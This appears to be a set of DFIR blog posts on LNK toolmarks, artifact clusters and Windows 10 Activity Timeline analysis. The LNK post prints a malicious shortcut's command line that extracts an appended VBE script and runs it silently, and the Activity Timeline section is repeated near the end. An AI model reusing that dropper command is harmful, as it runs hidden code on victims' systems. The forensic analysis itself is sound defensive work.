Tuesday, December 31, 2019
As 2019 closes, we move into not just a new year, but also a new decade. While, for the most part, this isn't entirely significant...after all, how different will you really be when you wake up on 2 Jan...times such as these offer an opportunity for reflection, and for addressing those things that we may decide we need to change.
I blogged recently regarding Brett's thoughts on how to go about improving #DFIR skills, and, to some extent, expanded on them from my own perspective. Then this morning, I was perusing one of the social media sites that I frequent, and came across a question regarding forensic analysis of "significant locations" on an iPhone 6. I really have no experience with smart phones or iOS, but I thought it would be interesting to take a quick look, so I did a Google search. The first result was an article that had been posted on the same social media site a year and a half ago.
I recently engaged with another analyst via social media, regarding recovering Registry hives from unallocated space. The analyst had specifically asked about FOSS tools, and in relatively short order, I found an 8-page PDF document on the subject, written by Andrew Case. The document wasn't dated, but it did refer specifically to Windows XP, so that gave me some idea of the time frame as to when Andrew "put pen to paper", as it were. Interestingly, Andrew's paper made use of one of the FOSS tools the analyst asked about, so it worked out pretty well.
The industry is populated by the full spectrum of #DFIR folks, from enthusiasts and those simply interested in the topic, to folks for whom digital analysis work is part of their job but not an everyday thing, all the way through to academics and highly dedicated professionals. There are those who don't "do" DFIR analysis all the time, and those whose primary role is to do nothing but digital analysis and research.
And there's always something new to learn, isn't there? There's always a question that needs to be answered, such as, "how do I recover an NTUSER.DAT hive from a deleted user profile?" I would go so far as to say that we all have questions such as these from time to time, and that some of us have the time to research these questions, and others don't. Some of us find applicable results pretty quickly, and some of us can spend a great deal of time searching for an answer, never finding anything that applies to what we're trying to accomplish. I know that's happened to me more times than I care to count.
The good news is that, in most cases, the information someone is seeking is out there. Someone knows it, and someone may have even written it down. The bad news is...the information is out there. If you don't have enough experience in the field or topic in question, you're likely going to have difficulty finding what you're looking for. I get it. For every time I run a Google search and the first half a dozen responses hit the nail squarely on the head, there are 5 or 6 searches where I've just not found anything of use...not because it doesn't exist but more likely due to my search terms.
Training can be expensive, and can require the attendee to be out of the office or off the bench for an extended period of time. And training may very often not cover those things for which we have questions. For example, throughout the past two decades, I've not only spoken publicly multiple times on the topic of Registry analysis, but have also written and conducted training courses (and even written books on the topic); even so, it never occurred to me that someone would want to recover the NTUSER.DAT hive from a deleted profile. And, even though I've asked multiple times over the years for feedback, even posing the question, "...what would you like to see covered/addressed?", not once has the topic of recovering deleted hives come up.
That is, until recently. Now, we have a need for "just in time training". The good news is that we have multiple resources available to us...Google, the Forensics Wiki, and Brett's DFIR Training site, to name a few. The down side is that even searching these sites in particular, you may not find what you're looking for.
So, for the coming year...nay, the coming decade...my request or "call to action" is for folks in the community to take more active steps in a couple of areas. First, develop purposeful, intentional relationships in the community. Go beyond following someone on social media, or clicking "Like" or "RT" to everything you see. Instead, connect with someone because you have a purposeful intention for doing so, and because you're aware of the value that you bring to the relationship. What this leads to is developing relationships based on trust, and subsequently, the sharing of tribal knowledge.
Second, actively take steps to maintain the knowledgebase. If you're looking for something, try the established repositories. If you can't find it there, but you do find an answer, and even if you end up building the answer yourself from bits and pieces, take active steps to ensure that what you found doesn't pass undocumented. I'll be the first to tell you that I haven't seen everything there is to see...I've never done a BEC investigation. There are a lot of ransomware infections I've never seen, nor investigated. My point is that we don't all see everything, but by sharing what we've experienced, we can ensure that more of us can benefit from each other's experiences. Jim Mattis, former Marine Corps warfighter and general officer, and former Secretary of Defense, stated in his recent book that our "own personal experiences are not broad enough to sustain [us]." This is 1000% true for warfighters, as well as for threat hunters, and forensic and intel analysts.
So, for the coming new year, resolve to take a more active role not just in learning new things, but also in adding to the knowledgebase of the community.
Sunday, December 29, 2019
LNK Toolmarks
Matt posted a blog article a while back, and I took interest in large part because it involved an LNK file. Matt provided a hash for the file in question, as well as a walk-through of his "peeling of the onion", as it were. However, one of the things that Matt pointed out that still needed to be done was toolmark analysis.
In his article, Matt says that LNK files "...stitch together the world between the attacker and the victim." He's right. When an actor sends an LNK file to a target, particularly as an email attachment, they are sharing evidence of their development environment, which can be used to track threat actors and their campaigns. This is facilitated by the fact that LNK files contain a great deal of metadata from the actor's dev environment that acts as "toolmarks", and by the fact that the absence of portions of that metadata can itself be considered a "toolmark", as well.
The metadata extracted from the LNK file Matt discussed is illustrated below:
File: d:\cases\lnk\foto
guid {00021401-0000-0000-c000-000000000046}
mtime Sat Sep 15 07:28:38 2018 Z
atime Thu Sep 26 22:40:14 2019 Z
ctime Sat Sep 15 07:28:38 2018 Z
workingdir %CD%
basepath C:\Windows\System32\cmd.exe
shitemidlist My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
C:2018-09-15 06:09:28 M:2019-09-23 17:18:10 A:2019-09-26 22:31:52 Windows (9) [526/1]
C:2018-09-15 06:09:28 M:2019-05-06 20:04:58 A:2019-09-26 22:02:08 System32 (9) [2246/1]
C:2018-09-15 07:28:40 M:2018-09-15 07:28:40 A:2019-09-26 22:38:36 cmd.exe (9)
vol_sn D4DA-5010
vol_type Fixed Disk
commandline /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename C:\Windows\System32\shell32.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath
As you can see, we have a good bit of what we'd expect to see in an LNK file, but there are also elements clearly absent, items we'd expect to see that just aren't there. For example, there are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc. These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to the end of the LNK file itself.
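As something of an aside, and purely as an illustration (the file name below is made up), checking for that appended content can be as simple as looking at what follows the final newline in the file, which is essentially what the "select -Last 1" in the command line above is doing:

# a minimal sketch; "Foto.lnk" is an illustrative file name
with open("Foto.lnk", "rb") as f:
    data = f.read()

# mirror the "get-content ... | select -Last 1" from the command line above
tail = data.rsplit(b"\n", 1)[-1]
print(tail[:200])

If the tail is just binary LNK structure data, nothing was appended; if it contains script content, you've likely recovered the payload the LNK was built to drop.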
While this particular LNK file is missing a good bit of what we would expect to see, based on the file format, there is still a good bit of information available that can be used to develop a better intel picture. For example, the volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate other, perhaps similar LNK files. This would then give some insight into how often this particular technique (and dev system) seems to be in use and in play, and if the VirusTotal page for each file found contains some information about the campaign in which it was seen, that might also be helpful.
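For those who want to pull that value themselves rather than rely on a full parser, the sketch below (in Python, and by no means a complete MS-SHLLINK parser) walks just far enough into the structure to reach the VolumeID and extract the drive type and serial number; the offsets are taken from the MS-SHLLINK format documentation:

import struct
import sys

def lnk_volume_info(path):
    with open(path, "rb") as f:
        data = f.read()

    # ShellLinkHeader is 76 (0x4C) bytes; LinkFlags sit at offset 0x14
    link_flags = struct.unpack_from("<I", data, 0x14)[0]
    offset = 0x4C

    # skip the LinkTargetIDList, if present (HasLinkTargetIDList)
    if link_flags & 0x01:
        idlist_size = struct.unpack_from("<H", data, offset)[0]
        offset += 2 + idlist_size

    # LinkInfo structure (HasLinkInfo)
    if not (link_flags & 0x02):
        return None
    li_start = offset
    li_flags = struct.unpack_from("<I", data, li_start + 8)[0]
    if not (li_flags & 0x01):   # no VolumeIDAndLocalBasePath
        return None
    vol_id_offset = struct.unpack_from("<I", data, li_start + 12)[0]
    vid = li_start + vol_id_offset

    # VolumeID: size (4), DriveType (4), DriveSerialNumber (4), ...
    drive_type, serial = struct.unpack_from("<II", data, vid + 4)
    return drive_type, "{:04X}-{:04X}".format(serial >> 16, serial & 0xFFFF)

if __name__ == "__main__":
    info = lnk_volume_info(sys.argv[1])
    if info:
        print("drive type: {}, vol_sn: {}".format(*info))

Run against the sample discussed above, the serial number should come back as D4DA-5010, matching the vol_sn field in the parser output.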
What something like this illustrates is the need for tying DFIR work much closer to CTI, and even EDR/MSS. Some organizations still have these functions as separate business units, and this is particularly true within consulting organizations. In such instances, CTI resources do not have the benefit of accessing DFIR information (and to some extent, vice versa), minimizing the view into incidents and campaigns. Having the ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.
Saturday, December 28, 2019
Improving DFIR Skills
There are more than a few skills that make up the #DFIR "field", and just one of them is conducting DFIR analysis. Brett Shavers recently shared his thoughts on how to improve in this area, specifically by studying someone else's case work. In his article, Brett lists a number of different avenues for reviewing work conducted by others as a means of improving your own skills.
Brett and I are both Marine veterans, and Marines have a long history of looking to the experience of others to expand, extend, and improve our own capabilities. In the case of war fighting, a great deal has been written, providing a wealth of information to dig into and study. Jim Mattis stated in his book, "Call Sign Chaos", that "...your personal experiences alone are not broad enough to sustain you." This is true not only for a Marine general, but also for a DFIR analyst. In fact, I would say even more so for an analyst.
Okay, so how do we apply this? One way is to follow Brett's advice, and seek out resources. There are numerous web sites available, and another resource is David Cowen's book, Computer Forensics InfoSec Pro Guide.
Another available resource is Investigating Windows Systems. What makes this book different from others that you might find is that when writing it, my goal was to demonstrate stitching together the analysis process, by explaining why certain decisions were made, and how the data and thought processes led to various findings. Rather than simply presenting a finding, I wanted to illustrate the data that was laid out before me when I made each of the analysis decisions. As with all of my other books, I wrote IWS in large part due to the fact that I couldn't find any book (or other resource) that took this approach.
Another approach is participating in CTFs. However, if you don't feel confident in participating in the actual CTF itself, but still want to take a shot at the analysis and see how others went about answering the challenge questions, there are often options available. In 2018, DefCon had a forensic analysis CTF, and a bit after the conference, several (I found 3) folks posted their take on the challenges.
My "thing" with CTFs is that they very often aren't 'real world'. For example, in all of my time as an incident responder, I've never had someone ask me to identify a disk signature or volume serial number from an acquired image. Can I? Sure. But it's never been part of the analysis process, in providing services to a customer. As such, I posted something of my own take on a few of the questions (here, and here), so they're available for anyone to read, and because the images are available, anyone can walk through what I or the other folks did, following along using their own tools and their own analysis processes.
If you do decide to engage in developing your skills, one of the best ways to do so is when you have someone to help you get over the humps. I'll admit it...sometimes, I take time to research something and may come up with a solution that isn't at all elegant, and could perhaps be done better. Or maybe, due to the fact that I'm relying on my own experiences, I don't see or consider something that, to someone else, is obvious. Having a mentor, someone you can go to with questions and bounce ideas off of, can be very beneficial in both the long and short term.
Wednesday, December 25, 2019
What is "best"?
A lot of times I'll see a question in DFIR-related social media, along the lines of, "what is the best tool to do X?" I've seen this a couple of times recently, perhaps the most recent being, "what is the best carving tool?" Nothing was stated with respect to what was being carved (files, records, etc.), what the operating or file system in question was, etc. Just, "what is the best tool?"
I was recently searching online for a tire inflator. I live on a farm, and have a couple of tractors, a truck, and a horse trailer. I don't need a fully-functional air compressor, but I do need something portable and manageable for inflating tires, something both my wife and I can use not only around the farm, but also when we're on the road. As I began looking around at product reviews, I also started seeing those "best of" lists, where someone (marketing firm, editorial board, etc.) compiled a list of what they determined to be the "best" available of a particular product.
Understand that I have a pretty good idea of what I'm looking for, particularly with respect to features. I'm looking for something that can plug into the cigarette lighter in the truck or car, or to another power source, such as "house power" or a portable generator. I'm looking for something that can fill a tire to at least 100 psi (some tires go to 12 psi, others 90 psi), but I'm not super-concerned about the speed; my primary focus is ease of use, and durability. Being able to set the desired pressure and have it auto-stop would be very useful, but it's not a show-stopper.
Some of the inflators listed as "best" had to be connected directly to the vehicle battery. Yeah, I know...right? Not particularly convenient if my wife needs to add pressure to a tire, particularly when plugging into the cigarette lighter is much more convenient. I mean, really...how "convenient" is it to pull over to the side of the road, and have someone who hasn't used jumper cables to jump-start another vehicle connect an inflator to battery terminals? Some inflators not listed as "best" were considered to be "too expensive" (although no threshold for cost was provided as a basis for testing), and looking a bit more closely, those inflators allowed the user to connect to different power sources. Okay, so that sort of makes sense, but rather than say that the product is "too expensive", maybe list why. Another was described as "too heavy", although it weighed just 5 lbs (as opposed to the "best", which came in at just over 3 lbs).
Bringing this back to #DFIR, I ran across this article the other day, which reportedly provides a list of the "top 10 digital forensics consulting/services companies". A list of the companies is provided on the page, with a brief description of what each company does, but what really stood out for me is that the list is compiled by "a distinguished panel of prominent marketing specialists". This, of course, begs the question as to the criteria used to determine which companies were reviewed, and of those, which made the top 10.
In 2012, I attended a conference presentation where the speaker made comments about various tools, including RegRipper. One comment was, "RegRipper doesn't detect...", and that wasn't necessarily true. RegRipper was released in 2008 with the intention of being a community-driven tool. However, only a few have stepped up over the years to write and contribute plugins. RegRipper is capable of detecting a great deal (null bytes in key/value names, RLO char, etc.), and if your installation of RegRipper "doesn't detect" something, it's likely that (a) you haven't written the plugin, or (b) you haven't asked someone for help writing the plugin.
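To be clear about what "detecting" means here, and purely as an illustration (this is not RegRipper plugin code, which is written in Perl), a check for key or value names containing a null byte or the right-to-left override (RLO) character can be as simple as the following; the sample names are made up:

SUSPICIOUS = {"\x00": "null byte", "\u202e": "RLO character"}

def flag_name(name):
    # return labels for any suspicious characters found in the name
    return [label for ch, label in SUSPICIOUS.items() if ch in name]

for key_name in ["Run", "Ru\u202Enni", "Norm\x00al"]:
    hits = flag_name(key_name)
    if hits:
        print("suspicious name:", repr(key_name), "->", ", ".join(hits))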
During that same presentation, the statement was made that "RegRipper does not scale to the enterprise". This is true. It is also true that it was never designed to do so. The use case for which RegRipper was written is still in active use today.
My point is simply this..."best" is relative. If you're asking the question (i.e., "..what is the best #DFIR tool to do X?"), then understand that, if you don't share your requirements, what you're going to get back is what's best for the respondent, if anything. No one wants to write an encyclopedia of all of the different approaches, and available tools. Although, I'm sure someone will be happy to link you to one. ;-)
When you're considering the best "tool", take a look at the process, and maybe consider the best approach. Sometimes it's not about the tool. Also, consider what it is you're trying to accomplish (your goals), as well as other considerations, such as the operating or file system, etc. If you're not comfortable with the command line, or would perhaps like to consider a GUI solution (because doing so makes for a good screen capture in a report), or if you require the use of a commercial (vs FOSS...some do) tool, be sure to take those details into consideration, and if you're asking a question online, share them, as well.
Tuesday, December 03, 2019
Artifact Clusters
Very often within the DFIR community, we see information shared (usually via blog posts) regarding a "new" artifact that has been recently unearthed, or simply being addressed for the first time. In some cases, the artifact is new to us, and in others, it may be the result of some new feature added to the Windows operating system or to an application. Sometimes when we see this new artifact discussed, a tool is shared to parse and make sense of the data afforded by that artifact. In some cases, we may find that multiple tools are available for parsing the same artifact, which is great, because it shows interest and diversity in the approach to accessing and making use of the data.
However, what we don't often see is how that artifact relates to other artifacts from the same system. Another way to look at it is, we don't often see how the tool, or more importantly, the data available in the source, can serve us to further an investigation. We may be left thinking, "Great, there's this data source, and a tool that allows me to extract and make some sense of the data within it, but how do I use it as part of an investigation?"
I shared an initial example of what this might look like in a recent blog post, and this was also the approach I took when I wrote about the investigations in Investigating Windows Systems. I hadn't seen any books available that covered the topic of digital forensic analysis (as opposed to just parsing data) from an investigation-wide perspective, completing an investigation using multiple artifacts to "tell the story". The idea was (and still is) that a single artifact, or a single entry derived from a data source, does NOT tell the whole story of the investigation. A single artifact may be a high fidelity indicator that provides a starting point for an investigation, but it does not tell the whole story. Rather than a single artifact, analysts should be looking at artifact clusters to provide the necessary context for an analyst to make a finding as to what happened.
Artifact clusters provide two things to the investigator; validation and context. Artifact clusters provide validation by reinforcing that an event occurred, or that the user took some action. That validation may be a duplicate event; in my previous blog post, we see the following events in our timeline:
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
What we see here (above) are duplicate events that provide validation. We see via the UserAssist data that the user launched WinWord.exe, and we also see validation from the user's Activity Timeline database. Not only do we have validation, but we can also see what the artifact cluster should look like, and as such, have an understanding of what to look for in the face of anti-forensics efforts, be they intentional or the result of natural evidence decay.
In other instances, validation may come in the form of supporting events. For example, again from my previous blog post, we see the following two events side-by-side in the timeline:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
In this example, we see that the user closed the Registry Editor, and that the user's LastKey value was set, illustrating the key that was in focus when the Registry Editor was closed. Rather than being duplicate events, these two events support each other.
Looking at different event sources during the same time period also helps us see the context of the events, as we get a better view of the overall artifact cluster. For example, consider the above timeline entries that pertain to the Registry Editor. With just the data from the Registry, we can see when the Registry Editor was closed, and the key that was in focus when it was closed. But that's about all we know.
However, if we add some more of the events from the overall artifact cluster, we can see not just when, but how the Registry Editor was opened, as illustrated below:
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
From a more complete artifact cluster, we can see that the user had the Registry Editor open for approximately 51 seconds. Information such as this can provide a great deal of context to an investigation.
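As a quick illustration of where that "approximately 51 seconds" comes from, pairing the "Start Time" and "End Time" entries for the same executable across the merged events is all that's required; the sketch below uses a simplified three-field version of the events shown above:

from datetime import datetime

# simplified (time, source, description) tuples from the timeline above
events = [
    ("Wed Nov 20 22:49:07 2019", "REG", "UserAssist - regedit.exe"),
    ("Wed Nov 20 22:49:11 2019", "TIMELINE", "Start Time:Windows\\regedit.exe"),
    ("Wed Nov 20 22:50:02 2019", "TIMELINE", "End Time:Windows\\regedit.exe"),
]

def parse(ts):
    return datetime.strptime(ts, "%a %b %d %H:%M:%S %Y")

starts = {d.split("Start Time:")[1]: parse(t)
          for t, src, d in events if "Start Time:" in d}
ends = {d.split("End Time:")[1]: parse(t)
        for t, src, d in events if "End Time:" in d}

for exe, start in starts.items():
    if exe in ends:
        print(exe, "was open for", (ends[exe] - start).seconds, "seconds")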
Evidence Oxidation
Artifact clusters give us a view into the data in the face of anti-forensics, either as dedicated, intentional, targeted efforts to remove artifacts, or as natural evidence decay or oxidation.
Wait...what? "Evidence oxidation"? What is that? I shared some DFIR thoughts on Twitter not long ago on this topic, and in short, what this refers to is the natural disappearance of items from artifact clusters due to the passage of time, as some of those artifacts are removed or overwritten as the system continues to function. This is markedly different from the purposeful removal of artifacts, such as Registry keys being specifically and intentionally modified or deleted.
This idea of "evidence decay" or "evidence oxidation" begins with the Order of Volatility, which lists different artifacts based on their "lifetime"; that is to say that different artifacts age out or expire at different rates. For example, a process executed in memory will complete (often within seconds, or sooner) and the memory used by that process will be freed for use by another process in fairly short order. That process may result in the operating system or application generating an entry into a log file, which itself may roll over or be overwritten at various rates (i.e., the entry itself is overwritten as newer entries are added), depending upon the logging mechanism. Or, a file may be created within the file system that exists until someone...a person...purposefully deletes it. Even then, the contents of the file may exist (NTFS resident file, etc.) for a time after the file is marked as "not in use", something that may be dependent upon the file system in use, the level of activity on the system, whether a backup mechanism (backup, Volume Shadow Copy, etc.) occurred between the file creation and deletion times, etc.
In short, some artifacts may have the life span of a snowflake, or a fruit fly, or a tortoise. The life span of an artifact can depend upon a great deal; the operating system (and version) employed, the file system structure, the auditing infrastructure, the volume of usage of the system, etc. Consider this...I was once looking at a USN Change Journal from an image acquired from a Windows 7 system, and the time span of the available data was maybe a day and a half. Right around that time, a friend of mine contacted me about a Windows 2003 system he was examining, for which the USN Change Journal contained 90 days worth of data.
Windows systems can be very active, even when they appear to be sitting idle with no one actively typing at the keyboard. The operating system itself may reach out for updates, during which files are downloaded, processes are executed, and files are deleted. The same is true for a number of applications. Once a user becomes active on the system, the volume of activity and changes may increase dramatically. I use several applications (Notepad++, UltraEdit, VirtualBox, etc.) that all reach out to the Internet to look for updates when they're launched. Just surfing the web causes browser history to be generated and cached.
Thursday, November 28, 2019
ActivitiesCache.db vs NTUSER.DAT
I recently had an opportunity to work with the data available in the Windows 10 Activity Timeline, or ActivitiesCache.db file. I'd seen a number of descriptions of the file contents, as well as descriptions of tools, but few of these are from the perspective of a DFIR analyst/responder, and none that I could find provided a view of how the data from the database stands up alongside other data sources an analyst might examine.
First, I grabbed a copy of my own ActivitiesCache.db file:
esentutl /y /vss <path>\ActivitiesCache.db /d ActivitiesCache.db
Then I grabbed a copy of my NTUSER.DAT hive:
reg save HKCU NTUSER.DAT
I used Eric Zimmerman's WxTCmd tool to parse the database; from the output, I got two CSV files (as described in Eric's blog post for the tool), one for the Activity table. I then wrote a Perl script to translate elements of the Activity table into the 5-field TLN timeline format that I use for analysis. This way, I was able to do something of a side-by-side comparison of data from the NTUSER.DAT hive with the contents of the ActivitiesCache.db database. Specifically, I created a timeline using the TLN variants of the UserAssist, RecentDocs, Applets, MSOffice and RecentApps RegRipper plugins, and then added the Activity table data to the events file before parsing it into a timeline.
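For anyone who'd rather not write their own translator, a rough sketch of that translation step appears below, in Python rather than Perl. The column names ("StartTime", "EndTime", "Executable"), the timestamp format, and the "Activity.csv" file name are assumptions about the WxTCmd CSV output and may need to be adjusted; the host and user fields are left for the analyst to fill in:

import csv
from datetime import datetime, timezone

def to_epoch(ts):
    # assumes "YYYY-MM-DD HH:MM:SS"-style timestamps in UTC
    return int(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
               .replace(tzinfo=timezone.utc).timestamp())

def activity_to_tln(csv_path, host="", user=""):
    events = []
    with open(csv_path, newline="", encoding="utf-8") as f:
        for row in csv.DictReader(f):
            exe = row.get("Executable", "")
            if row.get("StartTime"):
                events.append((to_epoch(row["StartTime"]), "TIMELINE",
                               host, user, "Start Time:" + exe))
            if row.get("EndTime"):
                events.append((to_epoch(row["EndTime"]), "TIMELINE",
                               host, user, "End Time:" + exe))
    return events

if __name__ == "__main__":
    # emit 5-field TLN records (time|source|host|user|description)
    for ev in sorted(activity_to_tln("Activity.csv")):
        print("|".join(str(x) for x in ev))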
What I found was pretty interesting.
For one, the data from the Activities table illustrated some interesting activity. For example, here's what the data looks like for when I opened a PDF document from my desktop:
Wed Nov 20 23:04:15 2019 Z
TIMELINE - End Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wed Nov 20 23:04:14 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 23:00:51 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 22:58:07 2019 Z
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe C:\Users\harlan\Desktop\A_Forensic_Audit_of_the_Tor_Browser_Bundle4.pdf
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
I was doing some research into a particular Registry value, and a search had revealed a hit within the PDF. I opened the PDF, and while it was open, also opened the MiTeC Windows Registry Recovery (WRR.exe) tool.
Another interesting finding is illustrated below:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
I opened RegEdit, navigated to a specific key, and that key was in focus when I closed RegEdit. With respect to the LastKey value, we're aware that's the context of the data...the key that was in focus when RegEdit was closed. What this clearly illustrates is "humanness"...human-based actions occurring and being recorded in these data sources. We can see from the UserAssist data how RegEdit was opened, we can see how long it was open (in this case, ~50 sec or so), and which key was in focus when it was closed. Looked at together, these artifacts provide a clear illustration of human activity.
Here's another example of what correlating the two data sources can look like:
Wed Nov 20 21:11:29 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 21:10:01 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs - local
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.dat - NTUSER.DAT
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder - local
Wed Nov 20 21:09:45 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
REG - [Program Execution] UserAssist - C:\Users\harlan\Desktop\WRR.exe (1)
In this particular case, I'd opened WRR and loaded an NTUSER.DAT file from a folder called "local".
Here's an example of how correlating the two data sources can provide additional insight and context into accessing files:
Wed Nov 20 20:20:56 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc - Armor of God.doc
TIMELINE - End Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
Wed Nov 20 20:09:29 2019 Z
REG - Word File MRU - C:\Users\harlan\Desktop\Armor of God.doc
REG - Word Place MRU - C:\Users\harlan\Desktop\
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
In this particular case, I was preparing for Bible study and had a Word document open. The data from the Activity Timeline database showed that MSWord had been opened, but it took data from the NTUSER.DAT hive (RecentDocs and MSOffice plugins) to provide information about which file had been opened. In this case, the data illustrates that I'd had the file open approximately 11 minutes.
I could go on with the examples, but suffice to say that the ActivitiesCache.db data provides context and validation to data from other sources; in this case, data from the NTUSER.DAT hive associated with user activity. Adding additional data from other sources, such as Automatic JumpLists, would not only provide additional context, but would be extremely valuable in the face of anti-forensics efforts. Getting a good view of what constitutes artifact clusters will also help us see when elements from those clusters are missing, potentially through deletion efforts.
Further, the correlation of multiple data sources gives us a better view not only of artifact clusters, but also of past activities. As I went through the timeline data, I saw references to files and applications that no longer existed on my system. I also saw references to files on external data sources (F:\, G:\, etc.).
Something else I found as a result of this exercise was that the first entry in the database table appears to be dated 20 Jun 2019. Based solely on the data available, it would appear that an update was applied, as I'm also seeing all of the LastWrite times for RecentDocs subkeys set to the same time shortly before the first entry in the database. A quick query via WMIC reveals that a security update was installed on that day, for KB4498523. The finding is reminiscent of what Jason Hale discussed in his blog post regarding shellbags and a Win10 feature update.
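For reference, the exact query I used isn't shown here, but something along the following lines (run from an elevated command prompt) will list installed updates and their install dates:

wmic qfe get HotFixID,InstalledOn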
Going Deeper
A while back, Mari had written a tool to parse deleted entries from a SQLite database, so I thought I'd give it a shot. I downloaded the CLI version of the tool, and after running it, got a TSV file that I opened up in Excel. There were a total of 630 rows, not all of which seemed to have much data, let alone much data of value. However, many of the rows contained what looked like extensive JSON-formatted data. A number of these contained references to files I'd opened in Notepad++, including the full path to the file, as well as the following:
{"gdprType":"ProductAndServiceUsage","clipboardDataId":"
So, much like other data sources, it appears that deleted items from this database file can provide additional insight and context, as well.
Additional Resources:
GroupIB writeup
Salt4n6 writeup
CCLGroup LTD writeup
Journal of Forensic Science paper
Medium.com article - lists descriptive resources, and tools, including Mark McKinnon's Autopsy plugin
PureInfoTech article - disabling the Timeline Activity feature (be sure to look for this being used for anti-forensics, or check the value if you're not finding the ActivitiesCache.db file)
Tools:
kacos2000 - WindowsTimeline
forensicMatt - ActivitiesCacheParser
Eric Z's Tools site
TZWorks - Timeline ActivitiesCache parser
Mari's SQLParser tools
First, I grabbed a copy of my own ActivitiesCache.db file:
esentutil /y /vss
Then I grabbed a copy of my NTUSER.DAT hive:
reg save HKCU NTUSER.DAT
I used Eric Zimmerman's WxTCmd tool to parse the database; from the output, I got two CSV files (as described in Eric's blog post for the tool), one for the Activity table. I then wrote a Perl script to translate elements of the Activity table into the 5-field TLN timeline format that I use for analysis. This way, I was able to do something of a side-by-side comparison of data from the NTUSER.DAT hive with the contents of the ActivitiesCache.db database. Specifically, I created a timeline using the TLN variants of the UserAssist, RecentDocs, Applets, MSOffice and RecentApps RegRipper plugins, and then added the Activity table data to the events file before parsing it into a timeline.
What I found was pretty interesting.
For one, the data from the Activities table illustrated some interesting activity. For example, here's what the data looks like for when I opened a PDF document from my desktop:
Wed Nov 20 23:04:15 2019 Z
TIMELINE - End Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wed Nov 20 23:04:14 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 23:00:51 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 22:58:07 2019 Z
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe C:\Users\harlan\Desktop\A_Forensic_Audit_of_the_Tor_Browser_Bundle4.pdf
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
I was doing some research into a particular Registry value, and a search had revealed a hit within the PDF. I opened the PDF, and while it was open, also opened the MiTeC Windows Registry Recovery (WRR.exe) tool.
Another interesting finding is illustrated below:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
